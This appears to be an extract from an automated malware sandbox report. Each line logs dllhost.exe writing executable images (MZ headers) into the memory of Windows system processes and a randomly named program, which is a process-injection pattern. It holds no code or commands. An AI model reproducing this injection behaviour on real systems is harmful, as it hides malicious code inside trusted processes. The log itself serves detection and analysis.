Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB06E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 238EF1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26CDA140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 5A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 10E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000 value starts with: 4D5A
